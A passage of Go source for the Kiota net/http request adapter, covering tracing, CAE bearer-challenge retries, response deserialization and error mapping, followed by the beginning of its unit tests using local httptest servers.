otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "getHttpResponseMessage") 125 | defer span.End() 126 | if ctx == nil { 127 | ctx = context.Background() 128 | } 129 | a.setBaseUrlForRequestInformation(requestInfo) 130 | additionalContext := make(map[string]any) 131 | if claims != "" { 132 | additionalContext[claimsKey] = claims 133 | } 134 | err := a.authenticationProvider.AuthenticateRequest(ctx, requestInfo, additionalContext) 135 | if err != nil { 136 | return nil, err 137 | } 138 | request, err := a.getRequestFromRequestInformation(ctx, requestInfo, spanForAttributes) 139 | if err != nil { 140 | return nil, err 141 | } 142 | response, err := (*a.httpClient).Do(request) 143 | if err != nil { 144 | spanForAttributes.RecordError(err) 145 | return nil, err 146 | } 147 | if response != nil { 148 | contentLenHeader := response.Header.Get("Content-Length") 149 | if contentLenHeader != "" { 150 | contentLen, _ := strconv.Atoi(contentLenHeader) 151 | spanForAttributes.SetAttributes(httpResponseBodySizeAttribute.Int(contentLen)) 152 | } 153 | contentTypeHeader := response.Header.Get("Content-Type") 154 | if contentTypeHeader != "" { 155 | spanForAttributes.SetAttributes(httpResponseHeaderContentTypeAttribute.String(contentTypeHeader)) 156 | } 157 | spanForAttributes.SetAttributes( 158 | httpResponseStatusCodeAttribute.Int(response.StatusCode), 159 | networkProtocolNameAttribute.String(response.Proto), 160 | ) 161 | } 162 | return a.retryCAEResponseIfRequired(ctx, response, requestInfo, claims, spanForAttributes) 163 | } 164 | 165 | const claimsKey = "claims" 166 | 167 | var reBearer = regexp.MustCompile(`(?i)^Bearer\s`) 168 | var reClaims = regexp.MustCompile(`\"([^\"]*)\"`) 169 | 170 | const AuthenticateChallengedEventKey = "com.microsoft.kiota.authenticate_challenge_received" 171 | 172 | func (a *NetHttpRequestAdapter) retryCAEResponseIfRequired(ctx context.Context, response *nethttp.Response, requestInfo *abs.RequestInformation, claims string, spanForAttributes trace.Span) (*nethttp.Response, error) { 173 | ctx, span := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "retryCAEResponseIfRequired") 174 | defer span.End() 175 | if response.StatusCode == 401 && 176 | claims == "" { //avoid infinite loop, we only retry once 177 | authenticateHeaderVal := response.Header.Get("WWW-Authenticate") 178 | if authenticateHeaderVal != "" && reBearer.Match([]byte(authenticateHeaderVal)) { 179 | span.AddEvent(AuthenticateChallengedEventKey) 180 | spanForAttributes.SetAttributes(httpRequestResendCountAttribute.Int(1)) 181 | responseClaims := "" 182 | parametersRaw := string(reBearer.ReplaceAll([]byte(authenticateHeaderVal), []byte(""))) 183 | parameters := strings.Split(parametersRaw, ",") 184 | for _, parameter := range parameters { 185 | if strings.HasPrefix(strings.Trim(parameter, " "), claimsKey) { 186 | responseClaims = reClaims.FindStringSubmatch(parameter)[1] 187 | break 188 | } 189 | } 190 | if responseClaims != "" { 191 | defer a.purge(response) 192 | return a.getHttpResponseMessage(ctx, requestInfo, responseClaims, spanForAttributes) 193 | } 194 | } 195 | } 196 | return response, nil 197 | } 198 | 199 | func (a *NetHttpRequestAdapter) getResponsePrimaryContentType(response *nethttp.Response) string { 200 | if response.Header == nil { 201 | return "" 202 | } 203 | rawType := response.Header.Get("Content-Type") 204 | splat := strings.Split(rawType, ";") 205 | return strings.ToLower(splat[0]) 206 | } 207 | 208 | func (a *NetHttpRequestAdapter) setBaseUrlForRequestInformation(requestInfo *abs.RequestInformation) { 209 | requestInfo.PathParameters["baseurl"] = a.GetBaseUrl() 210 | } 211 | 212 | func (a *NetHttpRequestAdapter) prepareContext(ctx context.Context, requestInfo *abs.RequestInformation) context.Context { 213 | if ctx == nil { 214 | ctx = context.Background() 215 | } 216 | // set deadline if not set in receiving context 217 | // ignore if timeout is 0 as it means no timeout 218 | if _, deadlineSet := ctx.Deadline(); !deadlineSet && a.httpClient.Timeout != 0 { 219 | ctx, _ = context.WithTimeout(ctx, a.httpClient.Timeout) 220 | } 221 | 222 | for _, value := range requestInfo.GetRequestOptions() { 223 | ctx = context.WithValue(ctx, value.GetKey(), value) 224 | } 225 | obsOptionsSet := false 226 | if reqObsOpt := ctx.Value(observabilityOptionsKeyValue); reqObsOpt != nil { 227 | if _, ok := reqObsOpt.(ObservabilityOptionsInt); ok { 228 | obsOptionsSet = true 229 | } 230 | } 231 | if !obsOptionsSet { 232 | ctx = context.WithValue(ctx, observabilityOptionsKeyValue, &a.observabilityOptions) 233 | } 234 | return ctx 235 | } 236 | 237 | // ConvertToNativeRequest converts the given RequestInformation into a native HTTP request. 238 | func (a *NetHttpRequestAdapter) ConvertToNativeRequest(context context.Context, requestInfo *abs.RequestInformation) (any, error) { 239 | err := a.authenticationProvider.AuthenticateRequest(context, requestInfo, nil) 240 | if err != nil { 241 | return nil, err 242 | } 243 | request, err := a.getRequestFromRequestInformation(context, requestInfo, nil) 244 | if err != nil { 245 | return nil, err 246 | } 247 | return request, nil 248 | } 249 | 250 | func (a *NetHttpRequestAdapter) getRequestFromRequestInformation(ctx context.Context, requestInfo *abs.RequestInformation, spanForAttributes trace.Span) (*nethttp.Request, error) { 251 | ctx, span := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "getRequestFromRequestInformation") 252 | defer span.End() 253 | if spanForAttributes == nil { 254 | spanForAttributes = span 255 | } 256 | spanForAttributes.SetAttributes(httpRequestMethodAttribute.String(requestInfo.Method.String())) 257 | uri, err := requestInfo.GetUri() 258 | if err != nil { 259 | spanForAttributes.RecordError(err) 260 | return nil, err 261 | } 262 | spanForAttributes.SetAttributes( 263 | serverAddressAttribute.String(uri.Scheme), 264 | urlSchemeAttribute.String(uri.Host), 265 | ) 266 | 267 | if a.observabilityOptions.IncludeEUIIAttributes { 268 | spanForAttributes.SetAttributes(urlFullAttribute.String(uri.String())) 269 | } 270 | 271 | request, err := nethttp.NewRequestWithContext(ctx, requestInfo.Method.String(), uri.String(), nil) 272 | 273 | if err != nil { 274 | spanForAttributes.RecordError(err) 275 | return nil, err 276 | } 277 | if len(requestInfo.Content) > 0 { 278 | reader := bytes.NewReader(requestInfo.Content) 279 | request.Body = NopCloser(reader) 280 | } 281 | if request.Header == nil { 282 | request.Header = make(nethttp.Header) 283 | } 284 | if requestInfo.Headers != nil { 285 | for _, key := range requestInfo.Headers.ListKeys() { 286 | values := requestInfo.Headers.Get(key) 287 | for _, v := range values { 288 | request.Header.Add(key, v) 289 | } 290 | } 291 | if request.Header.Get("Content-Type") != "" { 292 | spanForAttributes.SetAttributes( 293 | httpRequestHeaderContentTypeAttribute.String(request.Header.Get("Content-Type")), 294 | ) 295 | } 296 | if request.Header.Get("Content-Length") != "" { 297 | contentLenVal, _ := strconv.Atoi(request.Header.Get("Content-Length")) 298 | request.ContentLength = int64(contentLenVal) 299 | spanForAttributes.SetAttributes( 300 | httpRequestBodySizeAttribute.Int(contentLenVal), 301 | ) 302 | } 303 | } 304 | 305 | return request, nil 306 | } 307 | 308 | const EventResponseHandlerInvokedKey = "com.microsoft.kiota.response_handler_invoked" 309 | 310 | var queryParametersCleanupRegex = regexp.MustCompile(`\{\?[^\}]+}`) 311 | 312 | func (a *NetHttpRequestAdapter) startTracingSpan(ctx context.Context, requestInfo *abs.RequestInformation, methodName string) (context.Context, trace.Span) { 313 | decodedUriTemplate := decodeUriEncodedString(requestInfo.UrlTemplate, []byte{'-', '.', '~', '$'}) 314 | telemetryPathValue := queryParametersCleanupRegex.ReplaceAll([]byte(decodedUriTemplate), []byte("")) 315 | ctx, span := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, methodName+" - "+string(telemetryPathValue)) 316 | span.SetAttributes(urlUriTemplateAttribute.String(decodedUriTemplate)) 317 | return ctx, span 318 | } 319 | 320 | // Send executes the HTTP request specified by the given RequestInformation and returns the deserialized response model. 321 | func (a *NetHttpRequestAdapter) Send(ctx context.Context, requestInfo *abs.RequestInformation, constructor absser.ParsableFactory, errorMappings abs.ErrorMappings) (absser.Parsable, error) { 322 | if requestInfo == nil { 323 | return nil, errors.New("requestInfo cannot be nil") 324 | } 325 | ctx = a.prepareContext(ctx, requestInfo) 326 | ctx, span := a.startTracingSpan(ctx, requestInfo, "Send") 327 | defer span.End() 328 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 329 | if err != nil { 330 | return nil, err 331 | } 332 | 333 | responseHandler := getResponseHandler(ctx) 334 | if responseHandler != nil { 335 | span.AddEvent(EventResponseHandlerInvokedKey) 336 | result, err := responseHandler(response, errorMappings) 337 | if err != nil { 338 | span.RecordError(err) 339 | return nil, err 340 | } 341 | if result == nil { 342 | return nil, nil 343 | } 344 | return result.(absser.Parsable), nil 345 | } else if response != nil { 346 | defer a.purge(response) 347 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 348 | if err != nil { 349 | return nil, err 350 | } 351 | if a.shouldReturnNil(response) { 352 | return nil, nil 353 | } 354 | parseNode, _, err := a.getRootParseNode(ctx, response, span) 355 | if err != nil { 356 | return nil, err 357 | } 358 | if parseNode == nil { 359 | return nil, nil 360 | } 361 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "GetObjectValue") 362 | defer deserializeSpan.End() 363 | result, err := parseNode.GetObjectValue(constructor) 364 | a.setResponseType(result, span) 365 | if err != nil { 366 | span.RecordError(err) 367 | } 368 | return result, err 369 | } else { 370 | return nil, errors.New("response is nil") 371 | } 372 | } 373 | 374 | func (a *NetHttpRequestAdapter) setResponseType(result any, span trace.Span) { 375 | if result != nil { 376 | span.SetAttributes(attribute.String("com.microsoft.kiota.response.type", reflect.TypeOf(result).String())) 377 | } 378 | } 379 | 380 | // SendEnum executes the HTTP request specified by the given RequestInformation and returns the deserialized response model. 381 | func (a *NetHttpRequestAdapter) SendEnum(ctx context.Context, requestInfo *abs.RequestInformation, parser absser.EnumFactory, errorMappings abs.ErrorMappings) (any, error) { 382 | if requestInfo == nil { 383 | return nil, errors.New("requestInfo cannot be nil") 384 | } 385 | ctx = a.prepareContext(ctx, requestInfo) 386 | ctx, span := a.startTracingSpan(ctx, requestInfo, "SendEnum") 387 | defer span.End() 388 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 389 | if err != nil { 390 | return nil, err 391 | } 392 | 393 | responseHandler := getResponseHandler(ctx) 394 | if responseHandler != nil { 395 | span.AddEvent(EventResponseHandlerInvokedKey) 396 | result, err := responseHandler(response, errorMappings) 397 | if err != nil { 398 | span.RecordError(err) 399 | return nil, err 400 | } 401 | if result == nil { 402 | return nil, nil 403 | } 404 | return result.(absser.Parsable), nil 405 | } else if response != nil { 406 | defer a.purge(response) 407 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 408 | if err != nil { 409 | return nil, err 410 | } 411 | if a.shouldReturnNil(response) { 412 | return nil, nil 413 | } 414 | parseNode, _, err := a.getRootParseNode(ctx, response, span) 415 | if err != nil { 416 | return nil, err 417 | } 418 | if parseNode == nil { 419 | return nil, nil 420 | } 421 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "GetEnumValue") 422 | defer deserializeSpan.End() 423 | result, err := parseNode.GetEnumValue(parser) 424 | a.setResponseType(result, span) 425 | if err != nil { 426 | span.RecordError(err) 427 | } 428 | return result, err 429 | } else { 430 | return nil, errors.New("response is nil") 431 | } 432 | } 433 | 434 | // SendCollection executes the HTTP request specified by the given RequestInformation and returns the deserialized response model collection. 435 | func (a *NetHttpRequestAdapter) SendCollection(ctx context.Context, requestInfo *abs.RequestInformation, constructor absser.ParsableFactory, errorMappings abs.ErrorMappings) ([]absser.Parsable, error) { 436 | if requestInfo == nil { 437 | return nil, errors.New("requestInfo cannot be nil") 438 | } 439 | ctx = a.prepareContext(ctx, requestInfo) 440 | ctx, span := a.startTracingSpan(ctx, requestInfo, "SendCollection") 441 | defer span.End() 442 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 443 | if err != nil { 444 | return nil, err 445 | } 446 | 447 | responseHandler := getResponseHandler(ctx) 448 | if responseHandler != nil { 449 | span.AddEvent(EventResponseHandlerInvokedKey) 450 | result, err := responseHandler(response, errorMappings) 451 | if err != nil { 452 | span.RecordError(err) 453 | return nil, err 454 | } 455 | if result == nil { 456 | return nil, nil 457 | } 458 | return result.([]absser.Parsable), nil 459 | } else if response != nil { 460 | defer a.purge(response) 461 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 462 | if err != nil { 463 | return nil, err 464 | } 465 | if a.shouldReturnNil(response) { 466 | return nil, nil 467 | } 468 | parseNode, _, err := a.getRootParseNode(ctx, response, span) 469 | if err != nil { 470 | return nil, err 471 | } 472 | if parseNode == nil { 473 | return nil, nil 474 | } 475 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "GetCollectionOfObjectValues") 476 | defer deserializeSpan.End() 477 | result, err := parseNode.GetCollectionOfObjectValues(constructor) 478 | a.setResponseType(result, span) 479 | if err != nil { 480 | span.RecordError(err) 481 | } 482 | return result, err 483 | } else { 484 | return nil, errors.New("response is nil") 485 | } 486 | } 487 | 488 | // SendEnumCollection executes the HTTP request specified by the given RequestInformation and returns the deserialized response model collection. 489 | func (a *NetHttpRequestAdapter) SendEnumCollection(ctx context.Context, requestInfo *abs.RequestInformation, parser absser.EnumFactory, errorMappings abs.ErrorMappings) ([]any, error) { 490 | if requestInfo == nil { 491 | return nil, errors.New("requestInfo cannot be nil") 492 | } 493 | ctx = a.prepareContext(ctx, requestInfo) 494 | ctx, span := a.startTracingSpan(ctx, requestInfo, "SendEnumCollection") 495 | defer span.End() 496 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 497 | if err != nil { 498 | return nil, err 499 | } 500 | 501 | responseHandler := getResponseHandler(ctx) 502 | if responseHandler != nil { 503 | span.AddEvent(EventResponseHandlerInvokedKey) 504 | result, err := responseHandler(response, errorMappings) 505 | if err != nil { 506 | span.RecordError(err) 507 | return nil, err 508 | } 509 | if result == nil { 510 | return nil, nil 511 | } 512 | return result.([]any), nil 513 | } else if response != nil { 514 | defer a.purge(response) 515 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 516 | if err != nil { 517 | return nil, err 518 | } 519 | if a.shouldReturnNil(response) { 520 | return nil, nil 521 | } 522 | parseNode, _, err := a.getRootParseNode(ctx, response, span) 523 | if err != nil { 524 | return nil, err 525 | } 526 | if parseNode == nil { 527 | return nil, nil 528 | } 529 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "GetCollectionOfEnumValues") 530 | defer deserializeSpan.End() 531 | result, err := parseNode.GetCollectionOfEnumValues(parser) 532 | a.setResponseType(result, span) 533 | if err != nil { 534 | span.RecordError(err) 535 | } 536 | return result, err 537 | } else { 538 | return nil, errors.New("response is nil") 539 | } 540 | } 541 | 542 | func getResponseHandler(ctx context.Context) abs.ResponseHandler { 543 | var handlerOption = ctx.Value(abs.ResponseHandlerOptionKey) 544 | if handlerOption != nil { 545 | return handlerOption.(abs.RequestHandlerOption).GetResponseHandler() 546 | } 547 | return nil 548 | } 549 | 550 | // SendPrimitive executes the HTTP request specified by the given RequestInformation and returns the deserialized primitive response model. 551 | func (a *NetHttpRequestAdapter) SendPrimitive(ctx context.Context, requestInfo *abs.RequestInformation, typeName string, errorMappings abs.ErrorMappings) (any, error) { 552 | if requestInfo == nil { 553 | return nil, errors.New("requestInfo cannot be nil") 554 | } 555 | ctx = a.prepareContext(ctx, requestInfo) 556 | ctx, span := a.startTracingSpan(ctx, requestInfo, "SendPrimitive") 557 | defer span.End() 558 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 559 | if err != nil { 560 | return nil, err 561 | } 562 | 563 | responseHandler := getResponseHandler(ctx) 564 | if responseHandler != nil { 565 | span.AddEvent(EventResponseHandlerInvokedKey) 566 | result, err := responseHandler(response, errorMappings) 567 | if err != nil { 568 | span.RecordError(err) 569 | return nil, err 570 | } 571 | if result == nil { 572 | return nil, nil 573 | } 574 | return result.(absser.Parsable), nil 575 | } else if response != nil { 576 | defer a.purge(response) 577 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 578 | if err != nil { 579 | return nil, err 580 | } 581 | if a.shouldReturnNil(response) { 582 | return nil, nil 583 | } 584 | if typeName == "[]byte" { 585 | res, err := io.ReadAll(response.Body) 586 | if err != nil { 587 | span.RecordError(err) 588 | return nil, err 589 | } else if len(res) == 0 { 590 | return nil, nil 591 | } 592 | return res, nil 593 | } 594 | parseNode, _, err := a.getRootParseNode(ctx, response, span) 595 | if err != nil { 596 | return nil, err 597 | } 598 | if parseNode == nil { 599 | return nil, nil 600 | } 601 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "Get"+typeName+"Value") 602 | defer deserializeSpan.End() 603 | var result any 604 | switch typeName { 605 | case "string": 606 | result, err = parseNode.GetStringValue() 607 | case "float32": 608 | result, err = parseNode.GetFloat32Value() 609 | case "float64": 610 | result, err = parseNode.GetFloat64Value() 611 | case "int32": 612 | result, err = parseNode.GetInt32Value() 613 | case "int64": 614 | result, err = parseNode.GetInt64Value() 615 | case "bool": 616 | result, err = parseNode.GetBoolValue() 617 | case "Time": 618 | result, err = parseNode.GetTimeValue() 619 | case "UUID": 620 | result, err = parseNode.GetUUIDValue() 621 | default: 622 | return nil, errors.New("unsupported type") 623 | } 624 | a.setResponseType(result, span) 625 | if err != nil { 626 | span.RecordError(err) 627 | } 628 | return result, err 629 | } else { 630 | return nil, errors.New("response is nil") 631 | } 632 | } 633 | 634 | // SendPrimitiveCollection executes the HTTP request specified by the given RequestInformation and returns the deserialized primitive response model collection. 635 | func (a *NetHttpRequestAdapter) SendPrimitiveCollection(ctx context.Context, requestInfo *abs.RequestInformation, typeName string, errorMappings abs.ErrorMappings) ([]any, error) { 636 | if requestInfo == nil { 637 | return nil, errors.New("requestInfo cannot be nil") 638 | } 639 | ctx = a.prepareContext(ctx, requestInfo) 640 | ctx, span := a.startTracingSpan(ctx, requestInfo, "SendPrimitiveCollection") 641 | defer span.End() 642 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 643 | if err != nil { 644 | return nil, err 645 | } 646 | 647 | responseHandler := getResponseHandler(ctx) 648 | if responseHandler != nil { 649 | span.AddEvent(EventResponseHandlerInvokedKey) 650 | result, err := responseHandler(response, errorMappings) 651 | if err != nil { 652 | span.RecordError(err) 653 | return nil, err 654 | } 655 | if result == nil { 656 | return nil, nil 657 | } 658 | return result.([]any), nil 659 | } else if response != nil { 660 | defer a.purge(response) 661 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 662 | if err != nil { 663 | return nil, err 664 | } 665 | if a.shouldReturnNil(response) { 666 | return nil, nil 667 | } 668 | parseNode, _, err := a.getRootParseNode(ctx, response, span) 669 | if err != nil { 670 | return nil, err 671 | } 672 | if parseNode == nil { 673 | return nil, nil 674 | } 675 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "GetCollectionOfPrimitiveValues") 676 | defer deserializeSpan.End() 677 | result, err := parseNode.GetCollectionOfPrimitiveValues(typeName) 678 | a.setResponseType(result, span) 679 | if err != nil { 680 | span.RecordError(err) 681 | } 682 | return result, err 683 | } else { 684 | return nil, errors.New("response is nil") 685 | } 686 | } 687 | 688 | // SendNoContent executes the HTTP request specified by the given RequestInformation with no return content. 689 | func (a *NetHttpRequestAdapter) SendNoContent(ctx context.Context, requestInfo *abs.RequestInformation, errorMappings abs.ErrorMappings) error { 690 | if requestInfo == nil { 691 | return errors.New("requestInfo cannot be nil") 692 | } 693 | ctx = a.prepareContext(ctx, requestInfo) 694 | ctx, span := a.startTracingSpan(ctx, requestInfo, "SendNoContent") 695 | defer span.End() 696 | response, err := a.getHttpResponseMessage(ctx, requestInfo, "", span) 697 | if err != nil { 698 | return err 699 | } 700 | 701 | responseHandler := getResponseHandler(ctx) 702 | if responseHandler != nil { 703 | span.AddEvent(EventResponseHandlerInvokedKey) 704 | _, err := responseHandler(response, errorMappings) 705 | if err != nil { 706 | span.RecordError(err) 707 | } 708 | return err 709 | } else if response != nil { 710 | defer a.purge(response) 711 | err = a.throwIfFailedResponse(ctx, response, errorMappings, span) 712 | if err != nil { 713 | return err 714 | } 715 | return nil 716 | } else { 717 | return errors.New("response is nil") 718 | } 719 | } 720 | 721 | func (a *NetHttpRequestAdapter) getRootParseNode(ctx context.Context, response *nethttp.Response, spanForAttributes trace.Span) (absser.ParseNode, context.Context, error) { 722 | ctx, span := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "getRootParseNode") 723 | defer span.End() 724 | 725 | if response.ContentLength == 0 { 726 | return nil, ctx, nil 727 | } 728 | 729 | body, err := io.ReadAll(response.Body) 730 | if err != nil { 731 | spanForAttributes.RecordError(err) 732 | return nil, ctx, err 733 | } 734 | contentType := a.getResponsePrimaryContentType(response) 735 | if contentType == "" { 736 | return nil, ctx, nil 737 | } 738 | rootNode, err := a.parseNodeFactory.GetRootParseNode(contentType, body) 739 | if err != nil { 740 | spanForAttributes.RecordError(err) 741 | } 742 | return rootNode, ctx, err 743 | } 744 | func (a *NetHttpRequestAdapter) purge(response *nethttp.Response) error { 745 | _, _ = io.ReadAll(response.Body) //we don't care about errors comming from reading the body, just trying to purge anything that maybe left 746 | err := response.Body.Close() 747 | if err != nil { 748 | return err 749 | } 750 | return nil 751 | } 752 | func (a *NetHttpRequestAdapter) shouldReturnNil(response *nethttp.Response) bool { 753 | return response.StatusCode == 204 754 | } 755 | 756 | // ErrorMappingFoundAttributeName is the attribute name used to indicate whether an error code mapping was found. 757 | const ErrorMappingFoundAttributeName = "com.microsoft.kiota.error.mapping_found" 758 | 759 | // ErrorBodyFoundAttributeName is the attribute name used to indicate whether the error response contained a body 760 | const ErrorBodyFoundAttributeName = "com.microsoft.kiota.error.body_found" 761 | 762 | func (a *NetHttpRequestAdapter) throwIfFailedResponse(ctx context.Context, response *nethttp.Response, errorMappings abs.ErrorMappings, spanForAttributes trace.Span) error { 763 | ctx, span := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "throwIfFailedResponse") 764 | defer span.End() 765 | if response.StatusCode < 400 { 766 | return nil 767 | } 768 | spanForAttributes.SetStatus(codes.Error, "received_error_response") 769 | 770 | statusAsString := strconv.Itoa(response.StatusCode) 771 | responseHeaders := abs.NewResponseHeaders() 772 | for key, values := range response.Header { 773 | for i := range values { 774 | responseHeaders.Add(key, values[i]) 775 | } 776 | } 777 | var errorCtor absser.ParsableFactory = nil 778 | if len(errorMappings) != 0 { 779 | if errorMappings[statusAsString] != nil { 780 | errorCtor = errorMappings[statusAsString] 781 | } else if response.StatusCode >= 400 && response.StatusCode < 500 && errorMappings["4XX"] != nil { 782 | errorCtor = errorMappings["4XX"] 783 | } else if response.StatusCode >= 500 && response.StatusCode < 600 && errorMappings["5XX"] != nil { 784 | errorCtor = errorMappings["5XX"] 785 | } else if errorMappings["XXX"] != nil && response.StatusCode >= 400 && response.StatusCode < 600 { 786 | errorCtor = errorMappings["XXX"] 787 | } 788 | } 789 | 790 | if errorCtor == nil { 791 | spanForAttributes.SetAttributes(attribute.Bool(ErrorMappingFoundAttributeName, false)) 792 | err := &abs.ApiError{ 793 | Message: "The server returned an unexpected status code and no error factory is registered for this code: " + statusAsString, 794 | ResponseStatusCode: response.StatusCode, 795 | ResponseHeaders: responseHeaders, 796 | } 797 | spanForAttributes.RecordError(err) 798 | return err 799 | } 800 | spanForAttributes.SetAttributes(attribute.Bool(ErrorMappingFoundAttributeName, true)) 801 | 802 | rootNode, _, err := a.getRootParseNode(ctx, response, spanForAttributes) 803 | if err != nil { 804 | spanForAttributes.RecordError(err) 805 | return err 806 | } 807 | if rootNode == nil { 808 | spanForAttributes.SetAttributes(attribute.Bool(ErrorBodyFoundAttributeName, false)) 809 | err := &abs.ApiError{ 810 | Message: "The server returned an unexpected status code with no response body: " + statusAsString, 811 | ResponseStatusCode: response.StatusCode, 812 | ResponseHeaders: responseHeaders, 813 | } 814 | spanForAttributes.RecordError(err) 815 | return err 816 | } 817 | spanForAttributes.SetAttributes(attribute.Bool(ErrorBodyFoundAttributeName, true)) 818 | 819 | _, deserializeSpan := otel.GetTracerProvider().Tracer(a.observabilityOptions.GetTracerInstrumentationName()).Start(ctx, "GetObjectValue") 820 | defer deserializeSpan.End() 821 | errValue, err := rootNode.GetObjectValue(errorCtor) 822 | if err != nil { 823 | spanForAttributes.RecordError(err) 824 | if apiErrorable, ok := err.(abs.ApiErrorable); ok { 825 | apiErrorable.SetResponseHeaders(responseHeaders) 826 | apiErrorable.SetStatusCode(response.StatusCode) 827 | } 828 | return err 829 | } else if errValue == nil { 830 | return &abs.ApiError{ 831 | Message: "The server returned an unexpected status code but the error could not be deserialized: " + statusAsString, 832 | ResponseStatusCode: response.StatusCode, 833 | ResponseHeaders: responseHeaders, 834 | } 835 | } 836 | 837 | if apiErrorable, ok := errValue.(abs.ApiErrorable); ok { 838 | apiErrorable.SetResponseHeaders(responseHeaders) 839 | apiErrorable.SetStatusCode(response.StatusCode) 840 | } 841 | 842 | err = errValue.(error) 843 | 844 | spanForAttributes.RecordError(err) 845 | return err 846 | } 847 | -------------------------------------------------------------------------------- /nethttp_request_adapter_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | "context" 5 | "github.com/microsoft/kiota-abstractions-go/serialization" 6 | nethttp "net/http" 7 | httptest "net/http/httptest" 8 | "net/url" 9 | "testing" 10 | 11 | abs "github.com/microsoft/kiota-abstractions-go" 12 | absauth "github.com/microsoft/kiota-abstractions-go/authentication" 13 | absstore "github.com/microsoft/kiota-abstractions-go/store" 14 | "github.com/ordinaryhydr/kiota-http-go/internal" 15 | 16 | "github.com/stretchr/testify/assert" 17 | ) 18 | 19 | func TestItRetriesOnCAEResponse(t *testing.T) { 20 | methodCallCount := 0 21 | 22 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 23 | if methodCallCount > 0 { 24 | res.WriteHeader(200) 25 | } else { 26 | res.Header().Set("WWW-Authenticate", "Bearer realm=\"\", authorization_uri=\"https://login.microsoftonline.com/common/oauth2/authorize\", client_id=\"00000003-0000-0000-c000-000000000000\", error=\"insufficient_claims\", claims=\"eyJhY2Nlc3NfdG9rZW4iOnsibmJmIjp7ImVzc2VudGlhbCI6dHJ1ZSwgInZhbHVlIjoiMTY1MjgxMzUwOCJ9fX0=\"") 27 | res.WriteHeader(401) 28 | } 29 | methodCallCount++ 30 | res.Write([]byte("body")) 31 | })) 32 | defer func() { testServer.Close() }() 33 | authProvider := &absauth.AnonymousAuthenticationProvider{} 34 | adapter, err := NewNetHttpRequestAdapter(authProvider) 35 | assert.Nil(t, err) 36 | assert.NotNil(t, adapter) 37 | 38 | uri, err := url.Parse(testServer.URL) 39 | assert.Nil(t, err) 40 | assert.NotNil(t, uri) 41 | request := abs.NewRequestInformation() 42 | request.SetUri(*uri) 43 | request.Method = abs.GET 44 | 45 | err2 := adapter.SendNoContent(context.TODO(), request, nil) 46 | assert.Nil(t, err2) 47 | assert.Equal(t, 2, methodCallCount) 48 | } 49 | 50 | func TestItThrowsApiError(t *testing.T) { 51 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 52 | res.Header().Set("client-request-id", "example-guid") 53 | res.WriteHeader(500) 54 | res.Write([]byte("body")) 55 | })) 56 | defer func() { testServer.Close() }() 57 | authProvider := &absauth.AnonymousAuthenticationProvider{} 58 | adapter, err := NewNetHttpRequestAdapter(authProvider) 59 | assert.Nil(t, err) 60 | assert.NotNil(t, adapter) 61 | 62 | uri, err := url.Parse(testServer.URL) 63 | assert.Nil(t, err) 64 | assert.NotNil(t, uri) 65 | request := abs.NewRequestInformation() 66 | request.SetUri(*uri) 67 | request.Method = abs.GET 68 | 69 | err2 := adapter.SendNoContent(context.TODO(), request, nil) 70 | assert.NotNil(t, err2) 71 | apiError, ok := err2.(*abs.ApiError) 72 | if !ok { 73 | t.Fail() 74 | } 75 | assert.Equal(t, 500, apiError.ResponseStatusCode) 76 | assert.Equal(t, "example-guid", apiError.ResponseHeaders.Get("client-request-id")[0]) 77 | } 78 | 79 | func TestGenericError(t *testing.T) { 80 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 81 | res.WriteHeader(500) 82 | res.Write([]byte("test")) 83 | })) 84 | defer func() { testServer.Close() }() 85 | authProvider := &absauth.AnonymousAuthenticationProvider{} 86 | adapter, err := NewNetHttpRequestAdapterWithParseNodeFactory(authProvider, &internal.MockParseNodeFactory{}) 87 | assert.Nil(t, err) 88 | assert.NotNil(t, adapter) 89 | 90 | uri, err := url.Parse(testServer.URL) 91 | assert.Nil(t, err) 92 | assert.NotNil(t, uri) 93 | request := abs.NewRequestInformation() 94 | request.SetUri(*uri) 95 | request.Method = abs.GET 96 | 97 | result := 0 98 | errorMapping := abs.ErrorMappings{ 99 | "XXX": func(parseNode serialization.ParseNode) (serialization.Parsable, error) { 100 | result++ 101 | return nil, &abs.ApiError{ 102 | Message: "test XXX message", 103 | } 104 | }, 105 | } 106 | 107 | _, err2 := adapter.SendPrimitive(context.TODO(), request, "[]byte", errorMapping) 108 | assert.NotNil(t, err2) 109 | assert.Equal(t, 1, result) 110 | assert.Equal(t, "test XXX message", 